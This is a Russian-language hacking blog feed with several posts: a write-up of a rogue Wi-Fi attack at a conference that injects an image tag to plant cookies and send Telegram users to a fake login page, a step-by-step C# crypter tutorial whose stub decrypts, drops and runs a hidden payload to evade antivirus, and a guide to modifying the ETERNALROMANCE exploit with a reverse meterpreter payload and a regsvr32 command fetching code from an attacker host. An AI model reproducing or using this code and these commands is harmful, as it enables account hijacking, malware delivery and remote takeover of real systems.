  <h3>Positive Hack Days</h3>
  <p>Не так давно, на конференции <a href="https://zeronights.ru/" target="_blank">ZeroNights</a> я уже игрался с MiTM’ом, раздавая «бесплатный Wi-Fi», подрезая SSL и собирая трафик. На этот раз дамп трафика мне был уже неинтересен, поэтому основной целью была раздача волшебных печенек в браузеры пользователей.</p>
  <p></p>
  <p><strong>Шаг 1. Wi-Fi</strong></p>
  <p>У нас было 2 <a href="https://shop.hak5.org/products/wifi-pineapple" target="_blank">wi-fi pineapple</a>, 4500 потенциальных жертв, 3 <a href="http://www.alfa.com.tw/products_show.php?pc=34&ps=92" target="_blank">альфы</a>, несколько 8 dbi антенн и целое множество Wi-Fi карточек всех сортов и расцветок, а также <a href="https://github.com/byt3bl33d3r/MITMf" target="_blank">MITMf</a>, DNSspoof, <a href="https://github.com/sensepost/mana" target="_blank">Mana Toolkit</a>, strip-n-inject и проксирующий сервак с фейковым dns-сервером. Не то что бы это был необходимый запас для поездки. Но если начал собирать оборудование для MITM’а, становится трудно остановиться. Единственное что вызывало у меня опасение — это <a href="https://beefproject.com/" target="_blank">BeEF</a>. Нет ничего более беспомощного, безответственного и испорченного, чем XSS зомби. Я знал, что рано или поздно мы перейдем и на эту дрянь.</p>
  <p></p>
  <p>На помощь приходят «ананасы», это специальные устройства для атак с помощью поддельной Wi-Fi точки. На конференции было два этажа, а хотелось покрыть максимальное количество людей. К тому же раздавался официальный Wi-Fi с SSID «PHD», поэтому оставалось только запитать устройство. Отлично подошла розетка и место под столом на первом этаже.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/35/fb/35fb7aaa-6da7-4ba2-a2c8-3e988f1cf2a1.png" width="642" />
  </figure>
  <p>Ананасу помощнее, на втором этаже, повезло больше — ему достался ethernet-кабель, поэтому раздавался быстрый и стабильный интернет. «Альфа» с ноутбуком (эту же пару я использовал на ZeroNights) кочевала со мной. Вдобавок, я хотел приспособить <a href="https://www.tp-link.com/ru/home-networking/3g-4g-router/tl-mr3040/" target="_blank">mr3040</a> с <a href="https://openwrt.org/" target="_blank">OpenWRT</a>, но из-за количества людей и малой мощности я оставил эту идею.</p>
  <p>Ещё из Питера привезли мощный роутер Xiaomi, но из-за нехватки времени на прошивку/настройку он так и остался лежать в коробке. Тем более покрытие было уже достаточным для успешной атаки.</p>
  <h4>Шаг второй. DNS</h4>
  <p>Задача — записать куку на telegram.me, поэтому на сервере я создал поддомен i.telegram.me и отвечал на любой запрос установкой куки (без контента). Думаю, отдавать DNS с помощью DHCP смысла не много, но на всякий случай поставил unbound и открыл его миру (чтобы подключались). Сразу после PHDays пришла абуза, кто-то успел засканить dns и DDoS’ил им .gov сайты.</p>
  <p>Еще были использованы утилиты DNSMasqSpoof и DNSspoof. Первый вариант почему-то глючно работал, поэтому остался последний.</p>
  <h4>Шаг третий. Инъекция</h4>
  <p>На этот раз использовать sslstrip/sslsplit/hsts bypass не нужно. Да и зачем палиться? Чуть что, браузер начнет кричать на невалидность сертификата, а надо, чтоб он пользовался интернетом. При сёрфинге жертва скорее всего перейдет на http ресурс, а я тут как тут. Поэтому вконец документа вставлялся тег<br /> <code> &lt;img src=&quot;http://i.telegram.me/&quot; onerror=remove()&gt;</code></p>
  <p>Все просто — отправляется GET-запрос на несуществующий домен, но фейковый DNS отвечает нужным мне IP-адресом, в ответ от фейкового домена приходит заголовок с установкой cookie. Так как тег — изображение, срабатывает событие onerror и тег удаляется.<br /> Ребята из Hardware Village преложили делать инъекцию BeEf’а, чтобы полностью контролировать браузер жертвы, потом выводить на телике кто попался (да-да, как на конференции BlackHat). Не было времени, но в следующий раз надо заняться.</p>
  <p></p>
  <p>В результате, если пользователь зайдет на любой HTTP сайт используя мой WiFi, его браузер будет «заражённым», и когда он будет переходить по ссылкам telegram.me — его будет перенаправлять на фейковую страницу аутентификации.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/5a/8a/5a8aa62f-e62d-46b5-8c7c-4a19c7190592.png" width="960" />
    <figcaption>https://bo0om.ru/wp-content/uploads/2016/05/fake.gif</figcaption>
  </figure>
  <h4>Результаты</h4>
  <p>А вот результаты я ожидал получше…<br /> В первый день активной атаки (когда на конференции находится максимум народа) — никого. Никто не зашел. В середине конференции несколько внимательных зашли на страницы сниффера, полазили по фейкограму. Ближе к ночи был один вход. Ну хоть так…</p>
  <figure class="m_custom">
    <img src="https://bo0om.ru/wp-content/uploads/2016/05/first-day.png" width="592" />
  </figure>
  <p>Ещё один вход был пол второго ночи, его можно так же засчитать за первый день.</p>
  <p>На второй день я пошел перепроверять оборудование, все ли работает как надо? Я пробовал сам запускать браузер — всё круто, кука ставится, telegram.me редиректит, лог входа пишется. Пару часов сидел и перепроверял, в чем же может быть проблема. Народ цеплялся. Большинство было с мобильных устройств, но и ноутбуки охотно подключались. На Hardware Village к инъекции был запущен mitmf (с respoder’ом), на всякий случай. Опять два входа и опять ночью.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/ab/75/ab75f5c5-a6b7-4e09-a200-ca7a613ca593.png" width="1068" />
  </figure>
  <h4>Выводы</h4>
  <p><strong>Плюсы:</strong></p>
  <ul>
    <li>Помните, когда <a href="https://meduza.io/news/2016/04/29/aktivisty-oppozitsii-pozhalovalis-na-vzlom-telegram-s-odnogo-ip-adresa" target="_blank">сломали telegram журналистов</a>? Там было очень явное палево — IP адреса взломщика, ведь telegram сообщает, с какого IP происходит вход. В этом случае IP адрес <strong>будет совпадать с адресом жертвы</strong>. А так как мы контролируем сам клиент, мы имеем доступ к переписке и возможность выполнять любые действия от имени жертвы.</li>
    <li>Даже если стоит двухфакторная аутентификация — не поможет.</li>
    <li>Кнопку выхода можем заменить на уничтожении сессионного идентификатора <strong>только на стороне жертвы</strong>, тем самым наблюдать за перепиской всё время, пока жертва не уничтожит активные сессии в настройках.</li>
    <li>Способ можно модифицировать и улучшить</li>
  </ul>
  <p><strong>Минусы:</strong></p>
  <ul>
    <li>Пользователь вовсе может не зайти. Из 4500 человек на хакерской конференции пробив был менее 1%.</li>
    <li>Естественно, доступ к секретным чатам мы не получим.</li>
    <li>На невнимательных пользователей. Но лично я — не заметил бы.</li>
    <li>Если пользователь аутентифицируется в официальном веб-клиенте, кука перезапишется.</li>
  </ul>
  <p></p>
  <p>Статья была позаимствована с блога <a href="https://bo0om.ru/telegram-love-phdays" target="_blank">bo0om.ru</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/HkjYrR3J8</guid><link>https://teletype.in/@exploit_dar/HkjYrR3J8?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/HkjYrR3J8?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Пишем свой криптор на C#.</title><pubDate>Fri, 03 Jan 2020 14:53:54 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/e7/dc/e7dcadde-d25a-4b50-aba9-f46ce662f5da.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/e7/dc/e7dcadde-d25a-4b50-aba9-f46ce662f5da.png"></img>Привет, black hat kiddies, сегодня мы напишем свой полу-FUD криптор на языке богов (no) C#.]]></description><content:encoded><![CDATA[
  <p>Привет, black hat kiddies, сегодня мы напишем свой полу-FUD криптор на <s>языке богов (no)</s> C#.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/e7/dc/e7dcadde-d25a-4b50-aba9-f46ce662f5da.png" width="1200" />
    <figcaption>Cyberpunk style, hoe</figcaption>
  </figure>
  <p>Итак, прежде чем приступить к кодингу, разберём какие варианты крипторов есть:</p>
  <ul>
    <li>Имея байткод (любой .exe). То есть, вы сможете закриптовать файл, не зависимо от языка, на котором написана программа.</li>
    <li>Имея исходники. Этот вариант предназначен только под программы, написанные на одном (с криптором) ЯП.</li>
    <li>Крипторы с полиморфом/метаморфом. Если вкратце, то при помощи этих техник ваш криптор будет жить дольше, за счёт изменения кода файла, но при этом без изменения функционала.</li>
  </ul>
  <blockquote>Подробнее о полиморфизме и метаморфизме можно почитать <a href="https://wasm.in/blogs/metamorfizm-chast-i.247/" target="_blank">тут</a> и <a href="https://dic.academic.ru/dic.nsf/ruwiki/1099864" target="_blank">тут</a>.</blockquote>
  <p>В нашем случае мы будем писать криптор имея байткод. Приступим.</p>
  <p></p>
  <h3><strong>Первый затяг. Принцип работы нашего криптора. Код стаба.</strong></h3>
  <p>В решении у нас будет два проекта. Стаб криптора, и сам криптор.</p>
  <p>Криптор будет передавать зашифрованные байты стабу, а сам стаб их расшифрует, дропнет файл в рандомную папку, и запустит его. Звучит просто, да и на деле это будет несложно.</p>
  <p>Создаём новый консольный проект:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/7e/6d/7e6db1f1-a149-43a7-9af3-276cff1d7421.png" width="942" />
  </figure>
  <p>Объявим необходимые юзинги:</p>
  <pre>using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Threading;</pre>
  <p>И теперь сделаем метод дропа файла в рандом папку и его запуска:</p>
  <pre>static void DropAndRun(byte[] bytes, string fileName) // В качестве аргументов принимаем байты и имя файла
        {
            string[] dirs = new string[] // Создаём массив папок, в один из которых будет дропаться файл
к                {
                    Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), // AppData
                    Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), // ProgramData
                    Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), // LocalAppData
                    Path.GetTempPath() // Temp
                };</pre>
  <pre>            Random random = new Random(); // Создаём переменную random, для генерации случайного числа
            int pathIndex = random.Next(0, dirs.Length); // Определим индекс массива рандомно</pre>
  <pre>            string filePath = dirs[pathIndex] + &quot;\\&quot; + fileName; // Переменная, в которой хранится полный путь до файла</pre>
  <pre>            try
            {
                if (File.Exists(filePath)) // Делаем проверку на наличие файла в папке
                {
                    File.Delete(filePath); // Если файл существует, то удаляем его
                }      
                
                File.WriteAllBytes(filePath, bytes); // Записываем байты в файл
                Process.Start(filePath); // Запускаем
            }</pre>
  <pre>            catch { }
        }</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/f7/2d/f72dc8e3-162d-4e51-abba-3a8b601068f0.png" width="682" />
  </figure>
  <p>Далее просто скопируйте три метода: <a href="https://rextester.com/ZQLQ47839" target="_blank">RC4</a> - который отвечает за шифр байтов, <a href="https://rextester.com/WAGUH16295" target="_blank">StringToByteArray</a> - конвертирует строку в массив байтов, и <a href="https://rextester.com/NTLB76523" target="_blank">XOR</a> - который отвечает за шифр строки, </p>
  <p>И импортируйте их в проект:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/3d/30/3d30c81d-9df9-4c72-b2a2-e486f830b386.png" width="910" />
  </figure>
  <p>Осталось &quot;собрать&quot; главный метод, и стаб готов. А главный метод выглядит так:</p>
  <pre>        static void Main()
        {
              Thread.Sleep(6000); // Делаем небольшую задержку перед запуском
              byte[] encryptedBytes = StringToByteArray(XOR(&quot;[BYTES]&quot;)); // Сначала принимаем строку зашифрованных байтов (RC4 + XOR), декодируем XOR, в конце получаем зашифрованные байты.
              byte[] passBytes = Encoding.Default.GetBytes(&quot;[PASSWORD]&quot;); // Получаем байты пароля для RC4
              byte[] decryptedBytes = RC4(passBytes, encryptedBytes); // Декодируем байты
              DropAndRun(decryptedBytes, &quot;build.exe&quot;); // Дропаем и запускаем чистый файл      
        }</pre>
  <p>Стаб готов, теперь копируем весь код и создаём txt файл, в который помещаем наш код.</p>
  <p></p>
  <h3><strong>Второй затяг. Пишем GUI.</strong></h3>
  <p>Создаём новый проект Windows Forms.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/06/17/06172684-441a-4e0e-aba2-342aa8cdafd2.png" width="941" />
  </figure>
  <p>Добавим юзинги:</p>
  <pre>using Microsoft.CSharp;
using System;
using System.CodeDom.Compiler;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Windows.Forms;</pre>
  <p>В конструкторе добавляем 2 textbox&#x27;a, 3 button&#x27;a, ну и пару label&#x27;ов:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/90/af/90af510d-94d2-46f8-8165-7e3009290c6d.png" width="458" />
  </figure>
  <p>Для кнопки выбора файла создаём диалоговое окно:</p>
  <pre>        private void button1_Click(object sender, EventArgs e)
        {
            OpenFileDialog dialog = new OpenFileDialog();
            dialog.Filter = &quot;build.exe |*.exe&quot;;  // Фильтр
            if (dialog.ShowDialog() == DialogResult.OK)      
                textBox1.Text = dialog.FileName; // Добавляем полный путь до файла в textBox1            
        }</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/8a/2d/8a2d5a97-e0fc-4dbc-9503-aa8808422f45.png" width="843" />
  </figure>
  <p>Добавим методы шифра, получения рандомной строки, конвертирования массива байтов в строку:</p>
  <pre>        static string ByteArrayToString(byte[] ba)
        {
            return BitConverter.ToString(ba).Replace(&quot;-&quot;, &quot;&quot;);
        }</pre>
  <pre>        static string RandomString(int size)
        {
            Random random = new Random((int)DateTime.Now.Ticks);</pre>
  <pre>            StringBuilder builder = new StringBuilder();
            char ch;
            for (int i = 0; i &lt; size; i++)
            {
                ch = Convert.ToChar(Convert.ToInt32(Math.Floor(26 * random.NextDouble() + 65)));
                builder.Append(ch);
            }</pre>
  <pre>            return builder.ToString();
        }</pre>
  <p>Ну и методы XOR и RC4 такие же.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/6f/ea/6fea874d-ee64-42c8-8337-d81d7ae7c573.png" width="517" />
  </figure>
  <p>Для кнопки генерации ключа получаем рандом строку:</p>
  <pre>        private void button2_Click(object sender, EventArgs e)
        {
            Random rnd = new Random();
            int random = rnd.Next(6, 20); // Рандом цифра от 6 до 20
            textBox2.Text = RandomString(random); //Помещаем рандом строку, с рандомной длинной
        }</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/32/c7/32c710fc-b249-4a31-984f-6a420d628065.png" width="722" />
  </figure>
  <p>Теперь добавляем наш txt с кодом стаба в ресурсы проекта:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/42/cb/42cb6bca-89e2-4565-9b60-cbfd41948271.png" width="813" />
  </figure>
  <p>И добавим код для кнопки Build:</p>
  <pre>        private void button3_Click(object sender, EventArgs e)
        {
            string bytesString = ByteArrayToString(RC4(Encoding.Default.GetBytes(textBox2.Text), File.ReadAllBytes(textBox1.Text))); //Шифруем байты, конвертируем шифрованные байты файла в строку</pre>
  <pre>            CompilerParameters Params = new CompilerParameters();
            Params.GenerateExecutable = true;</pre>
  <pre>            Params.ReferencedAssemblies.Add(&quot;System.dll&quot;); // Добавляем ссылку на System.dll
            Params.CompilerOptions += &quot;\n/t:winexe&quot;; // Задаём тип выходных данных
            Params.OutputAssembly = &quot;Crypted.exe&quot;; // Имя файла</pre>
  <pre>            string Source = Properties.Resources.Stub_2D2D; // Переменная, в которой хранится код стаба
            Source = Source.Replace(&quot;[BYTES]&quot;, XOR(bytesString)); // Заменяем строку [BYTES], на заксоренную строку с шифрованными байтами
            Source = Source.Replace(&quot;[PASSWORD]&quot;, textBox2.Text); // Заменяем пароль для RC4</pre>
  <pre>            var settings = new Dictionary&lt;string, string&gt;();
            settings.Add(&quot;CompilerVersion&quot;, &quot;v4.0&quot;); // Указываем версию целевой платформы</pre>
  <pre>
            CompilerResults Results = new CSharpCodeProvider(settings).CompileAssemblyFromSource(Params, Source);</pre>
  <pre>            if (Results.Errors.Count &gt; 0)
            {
                foreach (CompilerError err in Results.Errors) // Если есть ошибки, выводим их циклом
                   MessageBox.Show(err.ToString()); 
            }
            else
            {
                MessageBox.Show(&quot;Crypted!&quot;, &quot;2D2D Cryptor&quot;); // Иначе, выводим сообщение, что всё гуд
            }
        }</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/bc/a5/bca5bbf3-0c07-4129-9b61-e38b2b0a9b4b.png" width="921" />
  </figure>
  <p>Криптор готов, проверяем.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/5f/4a/5f4af8d8-ebb4-4585-ac4e-a0b7560bd478.png" width="477" />
  </figure>
  <p>Ну и детекты (криптовал своего бота):</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/51/ee/51ee3caf-1f25-4383-9140-163dcc3e3f94.png" width="580" />
  </figure>
  <p>Ну, а на этом у меня всё, сам криптор вы можете найти на канале <a href="https://t.me/joinchat/AAAAAFN5di8jhc6XD1zriQ" target="_blank">Lаборатория.</a></p>
  <p>Dark $ide Admin, with love &lt;3</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/Bkey7KriB</guid><link>https://teletype.in/@exploit_dar/Bkey7KriB?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/Bkey7KriB?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Взлом ПК с помощью эксплоита ETERNALROMANCE/SYNERG.</title><pubDate>Sun, 10 Nov 2019 12:30:16 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/30/308c875c-f7c2-4c01-b798-5c7959c5f1ac.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/30/308c875c-f7c2-4c01-b798-5c7959c5f1ac.png"></img>Данная статья является переводом от зарубежного специалиста в ИБ ]]></description><content:encoded><![CDATA[
  <pre>@darkside_team</pre>
  <blockquote>Данная статья является переводом от зарубежного специалиста в ИБ </blockquote>
  <blockquote>(<strong>Автор: </strong>Sheila A. Berta (@UnaPibaGeek))</blockquote>
  <p> <strong>Введение</strong></p>
  <p>Когда компания Microsoft выпустила патчи для уязвимости MS17-010, было сообщено, что проблема касается платформ, начиная от Windows 7 (если быть совсем точным, то и Windows Vista тоже) и заканчивая Windows Server 2016. Хотя эксплоиты под кодовым названием &quot;ETERNALS&quot;, опубликованные группой TheShadowBrokers, которые пригодны для эксплуатации в Windows Server 2012 и более современных системах, - очень нестабильны и в 99% случаев вызывают BSOD на машине жертвы. </p>
  <p>С целью понимания и улучшения эксплоитов от NSA, опубликованные работы были проанализированы многими специалистами по безопасности. Как итог, некоторое время назад появилась более стабильная версия (разработанная исследователем Sleepya) эксплоита ETERNALROMANCE/SYNERGY с улучшенным методом эксплуатации и направленным на системы под управлением Windows Server 2012 и 2016. Однако для того чтобы использовать этот эксплоит необходимо разобраться в механизме работы этого скрипта и модифицировать некоторые вещи для получения желаемого результата.</p>
  <p>В этой статье будут даны пошаговые рекомендации для того, чтобы эксплоит работал корректно, а также разъяснения относительно модификации с целью получения meterpreter-сессии на целевой машине. </p>
  <p> Как обычно, вся информация приводится в ознакомительных целях.</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/30/308c875c-f7c2-4c01-b798-5c7959c5f1ac.png" width="945" />
  </figure>
  <p> <strong>Настройка лабораторной среды</strong></p>
  <p> Для настройки лабораторной среды нужно сконфигурировать следующие системы:</p>
  <p><strong>Целевая система - Windows Server 2016 </strong></p>
  <p>Эта машина с установленной 64-битной операционной системой Windows Server 2016 будет использоваться в качестве целевой.<br /> </p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image002.png" width="555" />
    <figcaption><em>Конфигурация целевой машины</em></figcaption>
  </figure>
  <p>После установки операционной системы дополнительные настройки не требуются. Достаточно знать IP-адрес и убедиться в том, что машина включена на момент атаки.</p>
  <p><strong>Система злоумышленника - GNU/Linux </strong></p>
  <p>Возможно использование любой другой операционной системы, которая поддерживает работу следующих инструментов:</p>
  <ul>
    <li>Python v2.7 - https://www.python.org/download/releases/2.7/ </li>
    <li>Ps1Encode - https://github.com/CroweCybersecurity/ps1encode </li>
    <li>Metasploit Framework - https://github.com/rapid7/metasploit-framework </li>
  </ul>
  <p>В итоге у нас есть две настроенные машины, используемые в лабораторной среде: </p>
  <ul>
    <li>Windows Server 2016 x64 – IP-адрес: 10.0.2.13 - Целевая система. </li>
    <li>GNU/Linux Debian x64 – IP-адрес: 10.0.2.6 - Система злоумышленника<em>. </em></li>
  </ul>
  <p><strong>Получение эксплоита</strong></p>
  <p> Эксплоит можно скачать по следующей ссылке:</p>
  <p> <a href="https://www.exploit-db.com/exploits/42315" target="_blank">https://www.exploit-db.com/exploits/42315/</a>.</p>
  <p> Поскольку скрипт написан на Python, сохраняем файл с расширением .py на машине злоумышленника. Во время запуска возникает следующая ошибка:</p>
  <p> </p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image004.png" width="590" />
    <figcaption><em>Ошибка, возникающая при запуске эксплоита</em></figcaption>
  </figure>
  <p></p>
  <p><strong>Решение проблем с зависимостями</strong></p>
  <p> В третьей строке эксплоита импортируется модуль &quot;mysmb&quot;, которого нет в Python. Установить этот модуль, разработанный Sleepya, можно установить при помощи утилиты pip, либо скачать по следующей ссылке: <a href="https://github.com/worawit/MS17-010/blob/master/mysmb.py" target="_blank">https://github.com/worawit/MS17-010/blob/master/mysmb.py</a>.</p>
  <p> Файл модуля с именем &quot;mysmb.py&quot; помещаем в папку со скриптом. Для того чтобы эксплоит смог импортировать код модуля, необходимо создать файл с именем «__INIT__.py» с перечнем нужных модулей.</p>
  <p> Теперь скрипт сможет найти нужный модуль и не будет выдавать ошибок:</p>
  <p> </p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image006.png" width="624" />
    <figcaption><em>Добавление файла __INIT__.py и запуск эксплоита</em></figcaption>
  </figure>
  <p></p>
  <p><strong>Проверка работоспособности эксплоита</strong></p>
  <p> Возможна проверка работоспособности эксплоита без каких-либо модификаций. Если мы запустим скрипт как есть по завершению работы в корневой директории диска C:\ на целевой машине будет создан файл с именем &quot;pwned.txt&quot;. <br /> Несмотря на то, что в простейшем случае никакие изменения не требуются, конкретно в вашей ситуации может потребоваться модификация некоторых параметров.</p>
  <p> <strong>Аутентификация</strong></p>
  <p>Уязвимость, используемая в эксплоите ETERNALROMANCE/SYNERGY, требует аутентификации. Эксплуатацию можно осуществить через гостевую учетную запись. Если гостевой аккаунт отключен, нам нужно получить имя пользователя и пароль любой другой учетной записи, которая используется на целевой машине. Важно отметить, что уровень привилегий не имеет значения. Даже если учетная запись с гостевыми правами, после атаки привилегии будут повышены до системного уровня. </p>
  <p>Информация об учетной записи задается в файле exploit.py в строках 26-27:</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image008.png" width="624" />
    <figcaption><em>Информация об имени пользователя и пароле, используемых для аутентификации во время атаки</em></figcaption>
  </figure>
  <p><strong>Параметры</strong></p>
  <p>Для корректной работы эксплоита необходимо настроить два параметра: IP-адрес целевой машины и имя канала (pipe name). Протокол SMB поддерживает три типа общих ресурсов:</p>
  <ul>
    <li>File: файловые (или дисковые) общие ресурсы, представляющие собой дерево директорий с файлами.</li>
    <li>Print: доступ к ресурсам принтера на сервере.</li>
    <li>Pipe: коммуникация между процессами, использующими модель FIFO, при помощи именованных каналов, которые активны до тех пор, пока система работает, даже если процесс уже не активен. </li>
  </ul>
  <p>В отличие от ETERNALBLUE эксплоиты ETERNALROMANCE и ETERNALSYNERGY используют именованные каналы, и, соответственно, нужно выбрать тип канала, который необходим во время атаки.</p>
  <p> Лично я пользуюсь «spoolss». Альтернативный вариант: «browser». Кроме того, можно воспользоваться сканером auxiliary/scanner/smb/pipe_auditor в metasploit для поиска доступных каналов на целевой машине.</p>
  <p> <strong>Запуск без шелл-кода</strong></p>
  <p> Теперь запускаем эксплоит при помощи следующей команды:</p>
  <pre>python exploit.py &lt;target_ip&gt; spoolss </pre>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image010.png" width="623" />
    <figcaption><em>Запуск эксплоита</em></figcaption>
  </figure>
  <p>Как было сказано ранее, если эксплуатация завершилась успешно, в корневой директории диска «C:\» появится новый файл «pwned.txt».</p>
  <p> </p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image012.png" width="419" />
    <figcaption><em> После успешной эксплуатации на целевой машине появился файл</em></figcaption>
  </figure>
  <p></p>
  <pre>pwned.txt</pre>
  <p> На данный момент мы уже сделали большой шаг, выполнив успешную эксплуатацию. Теперь нужно модифицировать эксплоит так, чтобы запустить шелл в meterpreter.</p>
  <p> <strong>Создание шелл-кода</strong></p>
  <p> Существует множество способов запустить meterpreter-шелл или выполнить какие-либо другие действия вместо создания текстового файла.</p>
  <p> Первый шаг – генерирование шелл-кода, который мы будем использовать в дальнейшем. Лично я очень люблю один метод, у которого масса преимуществ, когда речь заходит про обход различных защит.</p>
  <p> Шелл-код будет помещен в файл .SCT, который эксплоит будет загружать и запускать на целевой машине, в результате чего мы получим долгожданную meterpreter-сессию.</p>
  <p> <strong>Создание файла .SCT при помощи утилиты PS1ENCODE</strong></p>
  <p> Ps1encode позволяет сгенерировать и закодировать полезные нагрузки для metasploit в различных форматах на базе PowerShell.</p>
  <p> Эту утилиту можно загрузить на github: <a href="https://github.com/CroweCybersecurity/ps1encode" target="_blank">https://github.com/CroweCybersecurity/ps1encode</a>.</p>
  <p> Для генерирования нужной полезной нагрузки нам необходимо запустить Ps1encode со следующими параметрами:</p>
  <pre> ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST=&lt;ATTACKER_IP&gt; --LPORT=4444 -t sct</pre>
  <p> Сгенерированный файл .SCT должен храниться на веб-сервере на машине злоумышленника или в любом другом месте, к которому можно получить доступ из целевой системы. Поэтому при запуске предыдущей команды задается вопрос о том, какой будет полный URL, где мы будем хранить файл .sct. Если будет использоваться машина злоумышленника, нужно ввести следующий URL: http://&lt;ATTACKER_IP&gt;.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image014.png" width="623" />
  </figure>
  <p><strong>Помещение шелл-кода в место, доступное из целевой системы</strong></p>
  <p> На предыдущем шаге мы создали файл index.sct в папке утилиты Ps1Encode. Чтобы этот файл был доступен для загрузки эксплоитом на целевой машине мы должны поместить полезную нагрузку в папку веб-сервера и назначить нужные права.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image016.png" width="624" />
    <figcaption><em>Копирование полезной нагрузки на веб-сервер и назначение прав</em></figcaption>
  </figure>
  <p>После выполнения команд, показанных на рисунке выше, у нас появляется шелл-код, готовый к употреблению.</p>
  <p> <strong>Изменение эксплоита</strong></p>
  <p>Если мы откроем скрипт в текстовом редакторе и перейдем к строке 463 (и ниже), то увидим следующий код:</p>
  <p> </p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image018.png" width="624" />
    <figcaption><em> Участок кода эксплоита</em></figcaption>
  </figure>
  <p>На рисунке выше показаны функции, используемые для создания файла «pwned.txt» на целевой машине. Более интересной для нас является закомментированная строка с функцией service_exec().</p>
  <p> Функция service_exec() в качестве примера выполняет команду «copy» для создания копии файла «pwned.txt». Эта строка кода не будет выполняться до тех пор, пока вначале стоит символ «#». Если убрать этот символ и запустить эксплоит повторно, мы увидим, что в корне диска «C:\» появилось два файла: <em>pwned.txt </em>и <em>pwned_exec.txt</em>.</p>
  <p>Вместо команды copy можно поставить любую другую, которая нам необходима.</p>
  <p> <strong>Запуск шелл-кода</strong></p>
  <p> Теперь мы знаем, в каком месте нужно модифицировать эксплоит для выполнения команды загрузки и запуска шелла в meterpreter:</p>
  <pre> regsvr32 /s /n /u /i:http://&lt;attacker_webserver_ip&gt;/shellcode.sct scrobj.dll </pre>
  <p>Эксплоит будет выглядеть так:</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image020.png" width="624" />
    <figcaption><em>Модифицированная версия эксплоита</em></figcaption>
  </figure>
  <p></p>
  <p><strong>Получение Meterpreter-сессии</strong></p>
  <p> В самом конце, перед запуском эксплоита, мы должны настроить модуль exploit/multi/handler для получения meterpreter-сессии.</p>
  <p> </p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image022.png" width="623" />
    <figcaption><em>Настройка модуля exploit/multi/handler</em></figcaption>
  </figure>
  <p> Далее запускаем модифицированную версию эксплоита:</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image024.png" width="624" />
    <figcaption><em>Запуск измененного эксплоита</em></figcaption>
  </figure>
  <p>Через несколько секунд мы получим meterpreter-сессию на целевой машине с системными привилегиями.</p>
  <figure class="m_custom">
    <img src="https://www.securitylab.ru/_Article_Images/2017/51/clip_image026.png" width="624" />
    <figcaption>Получение сессии</figcaption>
  </figure>
  <p></p>
  <p>The End.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/rkQLnoAFH</guid><link>https://teletype.in/@exploit_dar/rkQLnoAFH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/rkQLnoAFH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Базовый анализ вирусов.</title><pubDate>Thu, 24 Oct 2019 04:44:59 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/3c/3c04c907-8ed7-4ed9-94aa-74cb0ef3dc58.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/3c/3c04c907-8ed7-4ed9-94aa-74cb0ef3dc58.png"></img>Привет, юный блэкхэт, в этой статье мы рассмотрим такую под-сферу в хакинге, как анализ малвари. ]]></description><content:encoded><![CDATA[
